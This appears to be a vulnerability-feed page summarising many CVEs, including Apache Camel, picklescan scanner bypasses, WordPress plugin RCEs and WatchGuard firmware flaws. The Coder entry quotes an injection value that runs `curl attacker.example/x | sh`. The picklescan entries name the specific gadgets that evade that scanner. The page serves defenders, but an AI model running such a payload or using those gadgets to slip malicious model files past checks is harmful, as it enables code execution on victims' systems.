Unauthenticated Camel control-header injection in Apache Camel's camel-cometd component (4.0.0 before 4.14.8, 4.15.0 before 4.18.3, and 4.19.0 before 4.21.0) lets any client that completes a Bayeux/CometD handshake inject internal headers such as CamelHttpUri, CamelFileName or CamelJmsDestinationName into the Camel Exchange, hijacking the behaviour of downstream producers. Because a CometdComponent installs no Bayeux SecurityPolicy by default, no authentication is required (PR:N), and the injected headers survive internal direct/seda/vm hops. Reported by Apache with a fix in 4.21.0; there is no public exploit identified at time of analysis and EPSS is low at 0.19% (9th percentile).

RCE Microsoft Apache +1
NVD VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Remote code execution in the Apache Camel camel-hazelcast component allows an attacker who can join or reach the Hazelcast cluster to run arbitrary code on every Camel node. The flaw exists because Camel-created Hazelcast instances apply no Java deserialization filter by default, so crafted serialized objects sent over the cluster protocol are deserialized (ObjectInputStream.readObject) before Camel processes them. It affects Camel 4.0.0-4.14.7, 4.15.0-4.18.2, and 4.19.0-4.20.x whenever a hazelcast consumer or repository uses Camel's own default configuration; there is no public exploit identified at time of analysis and EPSS is low (0.49%, 39th percentile).

Deserialization Java RCE +2
NVD VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Remote code execution in Apache Camel's camel-vertx-http component (4.0.0-4.14.7, 4.15.0-4.18.2, 4.19.0) arises when a producer endpoint deserializes 5xx HTTP response bodies marked application/x-java-serialized-object through a raw java.io.ObjectInputStream with no class filtering. Exploitation is limited to non-default deployments where transferException=true or allowJavaSerializedObject=true is set and throwExceptionOnFailure remains true, letting an attacker who controls or intercepts the backend deliver a malicious serialized object and, given a gadget chain on the classpath, run code on the Camel host. This is a vendor-reported (Apache) issue with a publicly available advisory; there is no public exploit identified at time of analysis and EPSS is low at 0.39% (31st percentile).

Deserialization Java RCE +2
NVD VulDB
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

Authenticated remote code execution in the FileOrganizer WordPress plugin before 1.2.0 lets users granted file-manager access upload arbitrary PHP files because several file-management operations skip file-type validation. Publicly available exploit code exists, and the flaw is an incomplete fix of CVE-2024-7985, which only hardened the upload operation while leaving other file-management endpoints unvalidated. With CVSS 3.1 base 8.8 (PR:L) and a working PoC, any low-privileged account with file-manager rights - extendable to sub-administrator roles via the premium add-on - can achieve full site compromise.

WordPress RCE PHP +1
NVD WPScan
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Authentication bypass in Apache Camel's camel-keycloak component (versions 4.15.0-4.18.2 and 4.19.0-4.20.x) allows any caller presenting a non-null Authorization: Bearer header value - including an arbitrary string or a forged, unsigned JWT - to bypass Keycloak token verification entirely and access routes protected by KeycloakSecurityPolicy. The cryptographic token checks (signature, issuer, expiry) are embedded exclusively inside role and permission validation routines that are never invoked when requiredRoles and requiredPermissions are empty, which is the documented default 'Basic Setup.' Where the protected route connects to a code-execution-capable Camel producer, this authentication bypass can escalate to unauthenticated remote code execution; no public exploit has been identified at time of analysis.

Authentication Bypass Apache RCE +1
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM POC This Month

Remote PHP code injection in stumasy's calculator module allows unauthenticated network attackers to execute arbitrary server-side code by manipulating the `mathematical_sentence` parameter passed unsanitized into PHP's `eval()` function in calculate.php. A public proof-of-concept exploit exists (GitHub issue #5), and no patch has been released - the project maintainer has not responded to the disclosure. The rolling release model means no fixed version can be cited; the vulnerability is present through at least commit 327d1b0f2915ba79d7ef8ebb74553e987609d9be.

Code Injection PHP RCE +1
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

Code injection in TidGi-Desktop up to version 0.13.0 allows remote attackers to execute arbitrary code through the application's Git Repository Import feature, specifically within the sub-wiki loading worker. The flaw resides in `src/services/wiki/wikiWorker/loadWikiTiddlersWithSubWikis.ts`, where externally-sourced Git repository content is processed without adequate code-injection safeguards (CWE-94). A public exploit has been disclosed and referenced via the GitHub security advisory GHSA-9hc2-hjx8-q6pv, though no CISA KEV listing exists at time of analysis.

Code Injection RCE Tidgi Desktop
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

Code injection in SourceCodester Multi-Vendor Online Grocery Management System 1.0 allows remote low-privileged attackers to execute arbitrary PHP code by manipulating the `content[]` argument passed to the `update_settings_info` function in `classes/SystemSettings.php`. A public proof-of-concept exploit has been disclosed on GitHub, and exploitation requires only a low-privileged authenticated session over the network. No CISA KEV listing exists, but the public exploit materially lowers the barrier for opportunistic attacks against any internet-exposed instance.

Code Injection PHP RCE +1
NVD VulDB GitHub
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Arbitrary code execution bypass in Trail of Bits fickling (versions ≤ 0.1.10) allows attackers to craft malicious pickle files that the tool's check_safety() gate rates LIKELY_SAFE with zero findings. Because the standard-library modules _posixsubprocess, site, and atexit are missing from the UNSAFE_IMPORTS denylist in fickle.py, payloads invoking _posixsubprocess.fork_exec, site.execsitecustomize, or atexit._run_exitfuncs pass the scanner and are then deserialized and executed by fickling.load(), which chains check_safety() into pickle.loads() as its security gate. No public exploit has been identified at time of analysis, and no EPSS or KEV signals are present in the input, but the advisory documents the exact bypass primitives.

Python RCE Fickling
NVD GitHub VulDB
EPSS 1% CVSS 8.5
HIGH POC PATCH This Week

Authenticated OS command injection in the myVesta hosting control panel lets a low-privileged user inject arbitrary shell commands through the v_ftp_user parameter during FTP-account deletion, escalating to full command execution as the admin user and takeover of the panel. Publicly available exploit code exists (documented by ProjectBlack/PRJBLK) and a vendor fix commit has been published, though no CISA KEV listing or EPSS data is provided. Because a scope change moves the attacker from a low-privilege panel account to admin-level command execution, this is a high-impact privilege-escalation-to-RCE path.

Command Injection RCE Vesta
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Malicious code execution via scanner bypass affects picklescan before 0.0.34, a security tool used to vet pickle files for unsafe deserialization before loading ML model artifacts. The scanner fails to flag the _operator.methodcaller built-in, so an attacker can craft a pickle that passes picklescan's malware check yet executes arbitrary code the moment a victim calls pickle.load(). No public exploit has been identified at time of analysis, and the flaw is not on CISA KEV; the fix landed in version 0.0.34.

Deserialization RCE Picklescan
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Detection bypass in picklescan before 0.0.33 lets attackers slip malicious pickle files past its security scanner by using operator.methodcaller, a callable the scanner's blocklist did not recognize. Any ML pipeline, model hub, or workflow that trusts picklescan to vet untrusted pickle/model files is affected, because a crafted payload will be marked safe yet execute arbitrary code the moment the file is deserialized. No public exploit identified at time of analysis and the flaw is not in CISA KEV, but the bypass technique is straightforward and the issue is tagged RCE by the reporting source (VulnCheck).

RCE Picklescan
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Security-scanner bypass in Picklescan before 0.0.33 lets attackers smuggle arbitrary-code-execution payloads past its safety checks by abusing the numpy.f2py.crackfortran.getlincoef gadget inside a pickle __reduce__ method, which the scanner fails to flag as dangerous. Because Picklescan is used to vet shared machine-learning model files, a malicious pickle passes as 'clean' and then executes attacker-controlled Python when the trusting downstream consumer deserializes it. No public exploit is identified at time of analysis, and it is not listed in CISA KEV; the CVSS 4.0 score is 7.6 and the attack depends on a victim actually loading the file.

Deserialization Python RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Safety-check bypass in picklescan before 0.0.28 allows attackers to smuggle malicious pickle files past the scanner by abusing torch.utils.data.datapipes.utils.decoder.basichandlers as a reduce gadget, so a payload the tool reports as clean still executes arbitrary code when the victim deserializes it. Because picklescan is a defensive scanner used to vet untrusted ML models (notably in Hugging Face workflows), this blind spot converts a trusted safety gate into a false sense of security. No public exploit identified at time of analysis, and it is not on CISA KEV; CVSS 4.0 base score is 7.6.

Deserialization RCE Picklescan
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Security-scanner detection bypass in picklescan before 0.0.34 lets attackers slip malicious pickle files past its checks by invoking _operator.attrgetter inside a reduce method, so a file the scanner reports as clean still executes arbitrary code when pickle.load() deserializes it. The flaw affects ML/AI supply-chain pipelines that rely on picklescan to vet untrusted model files. No public exploit identified at time of analysis; the issue was reported by VulnCheck and fixed in 0.0.34.

Deserialization RCE Picklescan
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Security-scanner evasion in picklescan before 0.0.28 lets attackers slip malicious pickle files past its safety checks by abusing the torch.utils.bottleneck.__main__.run_cprofile call, which the scanner's blocklist does not recognize as dangerous. Any ML pipeline or platform that relies on picklescan to vet untrusted models will therefore approve a weaponized file, and the embedded code runs with arbitrary execution when the victim deserializes it. No public exploit identified at time of analysis; not listed in CISA KEV, but VulnCheck published a dedicated advisory and the technique is fully documented.

Deserialization RCE Picklescan
NVD GitHub VulDB
EPSS 1% CVSS 7.6
HIGH PATCH This Week

Detection bypass in picklescan before 0.0.30 lets a crafted pickle smuggle the asyncio.unix_events._UnixSubprocessTransport._start built-in past the scanner's malicious-opcode checks, so a model or pickle that picklescan reports as safe actually executes arbitrary OS commands when a victim deserializes it. Because picklescan is a security scanner used to vet untrusted ML artifacts (e.g. in AI model supply chains), this false-negative turns a trusted safety gate into a blind spot. No public exploit identified at time of analysis and it is not on CISA KEV, but the technique is fully described in the VulnCheck advisory.

Deserialization RCE Picklescan
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Detection bypass in picklescan before 0.0.29 lets attackers slip malicious pickle payloads past the scanner by abusing lib2to3.pgen2.grammar.Grammar.loads inside a pickle reduce method, resulting in remote code execution when the file is later deserialized with pickle.load(). Because picklescan is trusted as a safety gate for machine-learning model files, a bypass converts a 'scanned and clean' verdict into silent arbitrary code execution. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV, though the technique is concretely described in the VulnCheck advisory.

Deserialization RCE Picklescan
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Security-scanner evasion in picklescan before 0.0.33 lets attackers smuggle malicious pickle files past its detection engine by abusing the numpy.f2py.crackfortran.param_eval function inside a pickle reduce method, so a payload the scanner declares safe still triggers arbitrary code execution when the application deserializes it. This defeats the exact protection picklescan exists to provide, endangering ML pipelines that rely on it to vet untrusted model/pickle files (e.g., Hugging Face-style workflows). No public exploit is identified at time of analysis and it is not in CISA KEV, though VulnCheck published an advisory.

Deserialization RCE Picklescan
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Malicious-pickle detection bypass in picklescan before 0.0.30 allows attackers to smuggle undetected remote code execution payloads past the scanner by abusing the torch.utils.bottleneck.__main__.run_autograd_prof gadget, which was absent from picklescan's dangerous-import blocklist. Because picklescan is used as a security gate to vet untrusted ML model files, a false-negative here means a crafted model passes as safe and executes arbitrary code when subsequently deserialized. Reported by VulnCheck via GHSA-4whj-rm5r-c2v8; no public exploit identified at time of analysis, and it is not on CISA KEV.

Deserialization RCE Picklescan
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Malicious pickle detection bypass in picklescan before 0.0.30 lets attackers hide code that runs during pickle.load, because the scanner does not flag the idlelib.run.Executive.runcode primitive used in a reduce method. Since picklescan is a security tool relied upon to vet PyTorch/ML model files, this bypass turns a trusted safety check into a false 'clean' verdict, enabling remote code execution and supply-chain attacks against anyone loading an attacker-supplied model. Reported by VulnCheck; no public exploit identified at time of analysis and not listed in CISA KEV.

Deserialization RCE Picklescan
NVD GitHub VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Arbitrary code execution in the NLTK Python library (nltk/nltk 3.9.3 and earlier) allows an attacker to run untrusted Java code when a victim loads a malicious JAR through five Stanford interface wrappers (StanfordPOSTagger, StanfordNERTagger, StanfordParser, StanfordDependencyParser, StanfordNeuralDependencyParser). These classes pass a user-controllable JAR path to an internal java() helper that calls subprocess.Popen() with no SHA256 integrity check, so a substituted or poisoned JAR executes with the user's privileges. This is a regression of CVE-2026-0848, whose SHA256 verification fix was applied only to StanfordSegmenter and never propagated to these five classes; no public exploit is identified at time of analysis, though a huntr bounty report exists.

Code Injection RCE Nltk Nltk +1
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL Act Now

Arbitrary code execution in keras-team/keras 3.14.0 lets remote attackers run OS-level commands by supplying a malicious serialized `Lambda` layer that is deserialized without an active `SafeModeScope`. The root cause is `_raise_for_lambda_deserialization()` treating a `None` `safe_mode` (the default when `from_config()` runs outside a `SafeModeScope`) as if it were an explicit `False`, so the safe-mode guard is skipped and attacker-controlled `marshal` bytecode executes. SSVC rates technical impact as total with a proof-of-concept available; EPSS is modest at 0.40% (32nd percentile), and the flaw is not in CISA KEV.

Deserialization RCE Keras Team Keras +1
NVD
EPSS 0% CVSS 7.3
HIGH This Week

Heap-based buffer overflow in GIMP's Paint Shop Pro (PSP) image format parser lets an attacker achieve arbitrary code execution or crash the application when a victim opens a maliciously crafted PSP file. The flaw stems from incorrect buffer-size arithmetic on low bit-depth images, and affects GIMP as shipped across Red Hat Enterprise Linux 6 through 9. There is no public exploit identified at time of analysis, and the issue is not listed in CISA KEV; exploitation requires local file-open interaction (CVSS 7.3).

Heap Overflow Denial Of Service Buffer Overflow +5
NVD VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

webpack-dev-server 5.2.5 and earlier crash the entire Node.js host process when an unauthenticated remote peer sends either an HTTP request with a malformed Host header or a WebSocket upgrade to the /ws endpoint with a malformed Origin header. The malformed value bypasses graceful error handling in the host-validation path, triggering an uncaught exception that terminates the dev server process entirely. Impact is confined to availability - no confidentiality loss and no code execution occur despite a misleading 'RCE' tag in the source intelligence, which appears to be a mislabeling inconsistent with the vendor description and CVSS vector (C:N/I:N). No public exploit or CISA KEV listing exists at time of analysis.

Node.js RCE Webpack Dev Server +2
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Arbitrary shortcode execution in the CURCY Multi Currency for WooCommerce WordPress plugin (versions up to and including 2.2.14) allows unauthenticated attackers to invoke any registered WordPress shortcode by sending a crafted request to a vulnerable action handler in frontend/cache.php. The root cause is a failure to validate the shortcode value before passing it to do_shortcode(), meaning any shortcode registered on the site - including those that expose user data, perform database queries, or render sensitive page content - can be triggered without authentication. No public exploit has been identified at time of analysis, and no CISA KEV listing is present, though the low attack complexity and zero-authentication requirement elevate practical risk above what the moderate CVSS score suggests.

Code Injection WordPress RCE +1
NVD
EPSS 1% CVSS 9.8
CRITICAL Act Now

Remote code execution and privilege escalation in HPLIP (HP Linux Imaging and Printing) affects the hpcups print filter across Red Hat Enterprise Linux 6 through 10, where an integer overflow triggered by specially crafted print data can corrupt memory. This is an incomplete-fix follow-up to CVE-2026-8631, meaning the original patch did not fully close the flaw, and no public exploit has been identified at time of analysis. The Red Hat CVSS of 9.8 reflects a network-reachable, unauthenticated attack path, though realistic exploitation depends on how the CUPS print pipeline is exposed.

Integer Overflow HP RCE +5
NVD VulDB
EPSS 1% CVSS 9.1
CRITICAL Act Now

Arbitrary file deletion in the Printcart Web to Print Product Designer for WooCommerce WordPress plugin (versions up to and including 2.5.2) lets unauthenticated attackers delete any file on the server, potentially escalating to remote code execution. The store_design_data() function builds a filesystem path from the attacker-controlled 'nbd_item_key' POST value and the nonce guarding the AJAX action can be freely retrieved by anonymous users, so exploitation needs no login. No public exploit has been identified at time of analysis, but the network-reachable, no-privilege profile makes this a high-priority patch.

WordPress Path Traversal RCE +1
NVD VulDB
EPSS 0% CVSS 8.5
HIGH This Week

Local privilege escalation to SYSTEM in ASUS Business Manager lets a low-privileged local user run arbitrary code by tampering with an inter-process communication (IPC) message that the software's privileged service trusts. Because the SYSTEM-level component controls a file name or path based on attacker-influenced IPC input (CWE-73), a standard user can coerce it into loading or executing attacker-chosen content. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV; ASUS is the reporter and has issued a security advisory.

RCE Asus Business Manager
NVD
EPSS 0% CVSS 8.6
HIGH This Week

Authenticated command execution in WatchGuard Fireware OS lets a privileged administrator escalate a specially crafted CLI command into arbitrary code execution via an out-of-bounds write (CWE-787). The flaw affects a very broad version span (Fireware OS 11.0 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2), placing most currently and historically deployed WatchGuard Firebox appliances in scope. No public exploit identified at time of analysis and the issue is not listed in CISA KEV; the CVSS 4.0 score of 8.6 reflects full confidentiality/integrity/availability impact once the required privileged access is obtained.

Memory Corruption Watchguard Buffer Overflow +2
NVD VulDB
EPSS 0% CVSS 8.6
HIGH This Week

Remote code execution in WatchGuard Fireware OS (the operating system powering Firebox network security appliances) allows an authenticated privileged administrator to run arbitrary code on the firewall by sending specially crafted requests to the Management Web UI, which trigger an out-of-bounds write in the networkd process. The flaw spans a wide version range (11.8 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2) and carries a CVSS 4.0 base score of 8.6 (High). It was reported by WatchGuard's own PSIRT; there is no public exploit identified at time of analysis and it is not listed in CISA KEV.

Memory Corruption Watchguard Buffer Overflow +2
NVD VulDB
EPSS 0% CVSS 7.7
HIGH This Week

Remote code execution in WatchGuard Fireware OS (the firmware powering WatchGuard Firebox firewall appliances) allows an unauthenticated attacker positioned on the same local/adjacent network segment to trigger an out-of-bounds write and execute arbitrary code. The flaw spans a wide firmware range - 11.0 through 11.12.4_Update1, 12.0 through 12.12, and 2025.1 through 2026.2 - and was self-reported by WatchGuard via its PSIRT. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the network-adjacent, unauthenticated, high-impact profile makes it a serious perimeter-device concern.

Watchguard Buffer Overflow RCE +1
NVD VulDB
EPSS 1% CVSS 9.2
CRITICAL Act Now

Remote code execution in WatchGuard Fireware OS affects Fireboxes running a Mobile User VPN with IKEv2 that authenticates against an external LDAP server. A race condition in the IKEv2 LDAP authentication path can be driven into a use-after-free (CWE-416) inside the iked daemon, letting a remote unauthenticated attacker execute arbitrary code in the context of that process. No public exploit identified at time of analysis, and the CVSS 4.0 base score of 9.2 is tempered by high attack complexity and a probabilistic attack requirement (AC:H/AT:P), reflecting the difficulty of reliably winning the race.

Memory Corruption Watchguard Use After Free +2
NVD VulDB
EPSS 0% CVSS 8.6
HIGH This Week

Authenticated arbitrary code execution in WatchGuard Fireware OS (12.1-12.12 and 2025.1-2026.2) arises from an out-of-bounds write in the wgagent process, reachable when a privileged user sends specially crafted requests to the Management Web UI. A high-privilege attacker (or one who has compromised admin credentials) can corrupt memory to run code on the firewall appliance, undermining the security gateway itself. No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV.

Memory Corruption Watchguard Buffer Overflow +2
NVD VulDB
EPSS 0% CVSS 8.6
HIGH This Week

Arbitrary code execution in WatchGuard Fireware OS (the firmware powering Firebox network security appliances) arises from an out-of-bounds write in the ikestubd process, reachable through the Management Web UI. An authenticated user holding privileged (administrative) access can send specially crafted requests to corrupt memory and execute code on the appliance. No public exploit identified at time of analysis and the issue is not listed in CISA KEV; risk is bounded by the requirement for existing privileged access.

Memory Corruption Watchguard Buffer Overflow +2
NVD VulDB
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Signature forgery and denial-of-service in Libreswan's IKEv1 RSA authentication allows a remote unauthenticated attacker to impersonate an IKE peer or crash the daemon. The flaw lives in RSA_authenticate_hash_signature_raw_rsa(), which fails to validate the length of the authentication hash inside a PKCS #1 (RFC 2313) encoded SIG payload; when a peer uses a small RSA public exponent such as e=3, a Bleichenbacher-style forgery becomes feasible. There is no public exploit identified at time of analysis and it is not in CISA KEV, but the impersonation impact against IKEv1 raw-RSA authentication makes this a high-severity issue (CVSS 8.1); remote code execution is explicitly not possible and X.509 certificate verification is unaffected.

Jwt Attack Denial Of Service RCE +1
NVD
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Peer impersonation and denial-of-service in Libreswan IPsec/IKEv2 arises from improper DER/ASN.1 digest verification in RSA_authenticate_hash_signature_pkcs1_1_5_rsa() when the IKEv2 AUTH payload uses RSASSA-PKCS1-v1_5 signatures. A remote unauthenticated attacker can mount a Bleichenbacher-style forgery to impersonate a peer when small RSA public exponents (e.g., e=3) are in use, or send an undersized hash to trip an assertion that aborts and restarts the daemon for sustained DoS. A vendor patch is available and there is no public exploit identified at time of analysis; RCE is not possible and X.509 certificate verification of the peer is unaffected.

Jwt Attack Denial Of Service RCE +1
NVD
EPSS 1% CVSS 7.5
HIGH This Week

Denial of service in the Libreswan IPsec VPN's pluto daemon allows remote unauthenticated attackers to crash and repeatedly restart the daemon by sending an invalidly formatted IKEv2 fragment. The off-by-one flaw affects any deployment permitting IKEv2 connections that do not explicitly set fragmentation=no, with no authentication or user interaction required; repeated exploitation sustains the outage. No public exploit identified at time of analysis, and no remote code execution is possible despite the mislabeled 'RCE' tag.

Denial Of Service RCE Libreswan
NVD VulDB
EPSS 0% CVSS 7.8
HIGH This Week

Local code execution in Notepad3 (versions through 6.25.822.1) arises from an insecure LoadLibrary(L"MSFTEDIT.DLL") call in the About-dialog path within src/Notepad3.c. Because the DLL is loaded by bare name, an attacker who can drop a malicious MSFTEDIT.DLL into the application directory or an earlier search-order location runs arbitrary code as the current user once that user opens the About dialog. No public exploit identified at time of analysis, and EPSS is low at 0.18% (8th percentile), consistent with a local, user-interaction-dependent flaw rather than a mass-exploitation target.

RCE Notepad3
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Authentication-bypass leading to remote code execution in 9router (npm package 9router) lets attackers reach spawn-capable MCP routes that were meant to be loopback-only. This is an incomplete fix for CVE-2026-46339: the local-only gate in src/dashboardGuard.js decides 'local' from attacker-controllable Host and Origin headers instead of the TCP source address, so any proxied or tunneled (Cloudflare Tunnel / Tailscale) deployment can be tricked into treating remote requests as local. Combined with the deterministic, machine-ID-derived CLI token, a remote attacker can inject JSON-RPC into MCP child processes (node, python, npx, etc.) and execute code on the host; no public exploit identified at time of analysis, though detailed reproduction steps are published in the vendor advisory.

Authentication Bypass Python Information Disclosure +1
NVD GitHub
CVSS 7.3
HIGH PATCH This Week

Heap out-of-bounds writes in jxl-oxide's jxl-grid crate allow attacker-controlled memory corruption on 32-bit platforms when decoding a crafted JPEG XL image, potentially leading to arbitrary code execution. An integer overflow in AlignedGrid's width×height length calculation produces an undersized backing buffer for huge logical dimensions, after which rendering writes through mutable subgrids beyond the allocation. Publicly available exploit code exists in the advisory (miri/ASan PoC tests); no active exploitation is reported (not in CISA KEV) and no EPSS score was provided.

Heap Overflow Buffer Overflow RCE
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM This Month

Double-free memory corruption in GIMP's PSP file format parser exposes local users to denial of service and potential arbitrary code execution when opening a specially crafted Paint Shop Pro image file. The flaw in read_layer_block() allows heap memory corruption that reliably crashes GIMP and, in a more sophisticated exploitation scenario, could enable arbitrary code execution with the privileges of the victim user. No public exploit has been identified and this vulnerability does not appear in the CISA KEV catalog, though upstream tagging of the issue as RCE-capable warrants patching in environments where GIMP users may open untrusted image files.

Denial Of Service Buffer Overflow RCE +4
NVD
EPSS 1% CVSS 8.1
HIGH This Week

Arbitrary file deletion in the TinyPNG (JPEG, PNG & WebP image compression) plugin for WordPress affects all versions through 3.6.13, allowing authenticated attackers with author-level access or higher to delete any file the web server can reach. Because deleting sensitive files such as wp-config.php pushes the site into a fresh-install state, this file-deletion primitive can be escalated to full remote code execution. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV, but it was disclosed by Wordfence with a clear exploitation path and carries a CVSS 8.1 (High).

WordPress Path Traversal RCE +2
NVD
EPSS 2% CVSS 8.8
HIGH PATCH This Week

Command injection leading to arbitrary code execution affects Coder's self-hosted developer workspace platform via the coder/registry `dotfiles` module, which interpolated the user-controlled `dotfiles_uri` into a shell script without validation. Combined with the Create Workspace page's `mode=auto` deep links, an attacker can craft a single URL that silently provisions a workspace with an attacker-supplied `dotfiles_uri` (e.g. `foo$(curl attacker.example/x | sh).com`), turning it into a one-click RCE against any authenticated user who clicks. CVSS is 8.8 (High) with EPSS at 2.28% (81st percentile); there is no public exploit identified and it is not in CISA KEV, though a proof-of-concept URL is documented in the advisory.

Command Injection RCE
NVD GitHub VulDB
EPSS 1% CVSS 8.7
HIGH This Week

Landray OA contains an unauthenticated HQL injection vulnerability that allows unauthenticated attackers to query arbitrary Hibernate entity classes by injecting malicious HQL syntax into the uid. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

RCE Information Disclosure
NVD
EPSS 1% CVSS 9.3
CRITICAL HOSTED Monitor

Redsea Cloud eHR contains an arbitrary file upload vulnerability that allows unauthenticated attackers to achieve remote code execution by uploading malicious files through the PtFjk.mob servlet. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

File Upload RCE
NVD
EPSS 1% CVSS 9.3
CRITICAL Act Now

Yonyou KSOA 9.0 contains an unauthenticated arbitrary file upload vulnerability in the com.sksoft.bill.ImageUpload servlet that allows unauthenticated attackers to upload arbitrary files by. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

File Upload RCE
NVD
EPSS 0% CVSS 7.8
HIGH This Week

Local privilege escalation in Little Orbit's GameFirst Anti-Cheat (GFAC) lets a low-privileged user reach SYSTEM and run arbitrary code in kernel mode by sending crafted messages to the GFAC_Sys_x64.sys minifilter communication port. All GameFirst Anti-Cheat builds up to and including the 2025-07-07 release are affected, and a public GitHub repository covering this CVE alongside two sibling flaws indicates exploit material is available. There is no public exploit identified as being actively used, but the CERT/CC coordination and shared PoC repository make weaponization plausible.

RCE Gamefirst Anti Cheat
NVD GitHub VulDB
EPSS 1% CVSS 9.8
CRITICAL Act Now

Arbitrary file upload leading to remote code execution in the Divi Form Builder WordPress plugin (versions through 5.1.8) lets unauthenticated attackers upload executable PHP files and run arbitrary code on the server. Attacker-controlled input from the acceptFileTypes POST parameter is interpolated directly into the file-validation regex in do_image_upload(), allowing alternate PHP extensions (.phtml, .phar, .php5, .php7) that evade the plugin's .php-only .htaccess block - and on Nginx the .htaccess protection does not apply at all. There is no public exploit identified at time of analysis and it is not in CISA KEV, but the CVSS 9.8 rating and Wordfence's technical disclosure make this a high-priority patching target.

WordPress Nginx PHP +3
NVD
EPSS 1% CVSS 10.0
CRITICAL Act Now

Unauthenticated remote code execution affects Creative Themes' Blocksy Companion Pro WordPress plugin in all versions up to and including 2.1.46, allowing remote attackers to inject and execute arbitrary code (CWE-94) without any authentication or user interaction. Rated CVSS 10.0 with a scope-changed vector, this is a maximum-severity flaw reported by Patchstack. No public exploit identified at time of analysis and it is not currently listed in CISA KEV, but the trivial exploitability of an unauthenticated RCE makes it a high-priority patching target.

Code Injection RCE Blocksy Companion Pro
NVD VulDB
EPSS 0% CVSS 9.0
CRITICAL Act Now

Unauthenticated arbitrary code execution affects the W3 Total Cache WordPress caching plugin in all versions up to and including 2.9.4, allowing remote attackers to execute code and fully compromise the underlying site without credentials or user interaction. The scope-changing CVSS 9.0 (Critical) rating reflects the plugin's deep hooks into WordPress request handling. There is no public exploit identified at time of analysis and no CISA KEV listing, though the high exploitability of a widely deployed plugin makes it a strong patching priority.

RCE W3 Total Cache
NVD
EPSS 0% CVSS 9.1
CRITICAL Act Now

Remote code execution in the Five Star Business Profile and Schema WordPress plugin (versions up to and including 2.3.19) allows an attacker holding an Editor-level or higher account to inject and execute arbitrary PHP code on the host. Reported by Patchstack and rated CVSS 9.1 due to its scope-changing impact, the flaw turns a trusted content role into full server compromise. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the CWE-94 code-injection root cause makes reliable exploitation straightforward for any authorized high-privilege user.

Code Injection RCE Five Star Business Profile And Schema
NVD VulDB
EPSS 3% CVSS 7.2
HIGH This Week

Authenticated OS command injection in the WP Database Backup plugin for WordPress (all versions up to and including 7.11) lets administrator-level users execute arbitrary operating system commands on the underlying server, escalating a WordPress admin foothold into full host RCE. The flaw stems from the wp_db_exclude_table POST parameter being concatenated unescaped into the mysqldump shell command; the injection is stored, so payloads persist in the options table and fire whenever a backup runs. Reported by Wordfence with no public exploit identified at time of analysis and no CISA KEV listing.

Command Injection WordPress RCE +2
NVD
EPSS 0% CVSS 7.5
HIGH This Week

Unauthenticated code injection in the Request a Quote plugin for WordPress (versions up to and including 2.5.5) lets remote attackers invoke arbitrary zero-argument PHP functions on the server through the emd_delete_file AJAX action. Because the handler is registered for wp_ajax_nopriv and derives a callable function name from the attacker-controlled $_POST['path'] parameter, an attacker can trigger functions such as phpinfo() to expose server configuration and credentials, or destructive built-in functions. No public exploit identified at time of analysis, but the nonce that is the sole gatekeeper is printed directly into the public quote-form page, effectively neutralizing it.

WordPress RCE PHP
NVD VulDB
EPSS 0% CVSS 8.3
HIGH This Week

Out-of-bounds array access in GeoVision's GeoWebPlayer addon (also branded 'Web Plugin' in GV-VMS and 'WS Player' in VMS-Cloud) can lead to remote code execution when the addon's localhost WebSocket server processes a saveVideo command with an attacker-controlled index. Because the addon ships with widely-used GeoVision products (GV-VMS, GV-Cloud) and is reachable from a victim's browser via a malicious web page, a lured user visiting attacker-controlled content can trigger an out-of-bounds function-pointer call. This is a Talos-reported (TALOS-2026-2373) issue with no public exploit identified at time of analysis and is not listed in CISA KEV.

RCE Geowebplayer
NVD
EPSS 0% CVSS 8.7
HIGH POC PATCH This Week

Authenticated remote code execution in Craft CMS 5.9.0 through 5.9.x allows control panel users with entry-editing permissions to inject unsandboxed Twig code via the HTTP Referer header during entry save operations. Because the signed redirect URL derived from the attacker-controlled Referer is compiled with renderObjectTemplate() instead of the sandboxed renderSandboxedObjectTemplate(), a low-privileged CMS operator can achieve server-side template injection leading to code execution. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the flaw is fixed in Craft CMS 5.10.0.

